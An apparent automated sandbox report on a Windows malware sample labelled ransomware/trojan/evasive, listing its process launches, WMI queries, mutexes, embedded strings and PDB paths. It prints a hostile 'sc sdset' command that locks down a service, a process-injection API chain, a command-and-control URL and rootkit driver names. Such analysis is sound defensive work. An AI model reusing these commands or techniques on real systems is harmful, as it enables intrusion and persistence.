            Source: C:\Windows\windefender.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Process WHERE Name = &apos;fragrantbutterfly.exe&apos;
            Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrssJump to behavior
            Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@51/17@13/6
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00927F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,34_2_00007FF6A00927F0
            Source: C:\Windows\rss\csrss.exeMutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_01
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeMutant created: \Sessions\1\BaseNamedObjects\Global\qtxp9g8w
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:488:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_01
            Source: f6oNLRKHUy.exeString found in binary or memory: application/app/install.go
            Source: f6oNLRKHUy.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: f6oNLRKHUy.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: f6oNLRKHUy.exeString found in binary or memory: largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2 /bots/scheduled-install23283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakh
            Source: f6oNLRKHUy.exeString found in binary or memory: application/app/install.go
            Source: f6oNLRKHUy.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: f6oNLRKHUy.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: f6oNLRKHUy.exeString found in binary or memory: largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2 /bots/scheduled-install23283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakh
            Source: csrss.exeString found in binary or memory: application/app/install.go
            Source: csrss.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: csrss.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: csrss.exeString found in binary or memory: largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2 /bots/scheduled-install23283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakh
            Source: csrss.exeString found in binary or memory: application/app/install.go
            Source: csrss.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: csrss.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: csrss.exeString found in binary or memory: largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2 /bots/scheduled-install23283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakh
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: f6oNLRKHUy.exeStatic file information: File size 3788288 > 1048576
            Source: f6oNLRKHUy.exeStatic PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x39ca00
            Source: Binary string: Loader.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: symsrv.pdb source: f6oNLRKHUy.exe, 00000001.00000002.360314790.0000000000C57000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.370257629.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627870906.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.390880568.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.392824484.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.406627827.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.408434896.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.428005891.0000000000C57000.00000040.00020000.sdmp
            Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: Unable to locate the .pdb file in this location source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: The module signature does not match with .pdb signature. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: .pdb.dbg source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: '(EfiGuardDxe.pdbx source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000026.00000002.427962622.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: symsrv.pdbGCTL source: f6oNLRKHUy.exe, 00000001.00000002.360314790.0000000000C57000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.370257629.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627870906.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.390880568.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.392824484.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.406627827.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.408434896.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.428005891.0000000000C57000.00000040.00020000.sdmp
            Source: Binary string: or you do not have access permission to the .pdb location. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
